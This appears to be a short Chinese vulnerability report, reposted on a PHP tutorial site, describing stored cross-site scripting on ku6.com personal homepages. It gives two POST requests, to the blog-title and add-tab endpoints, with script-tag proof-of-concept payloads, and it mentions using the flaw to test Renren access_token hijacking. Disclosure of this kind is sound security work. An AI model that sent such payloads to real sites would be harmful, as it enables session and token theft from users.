来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 个人主页,存在XSS的地方挺多的。PS:其实找这个是因为要测试人人网的access_token劫持漏洞。详细说明:1、主页标题处存在POST /user.htm?t=update HTTP/1.1Host: zone.ku6.comCookie: form......
|
个人主页,存在XSS的地方挺多的。
PS:其实找这个是因为要测试人人网的access_token劫持漏洞。 详细说明:1、主页标题处存在 POST /user.htm?t=update HTTP/1.1 ………… Host: zone.ku6.com Cookie: ………… format=json&uid=17958620&blogname=hi<script>alert(1)</script> 2、添加页面 POST /tab.htm?t=update HTTP/1.1 ………… Host: zone.ku6.com Cookie: …… id=41924336&title=b<script>alert(document.location.hash)</script> 漏洞证明:  修复方案: 过滤,好多地方都有 作者PiaCa |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
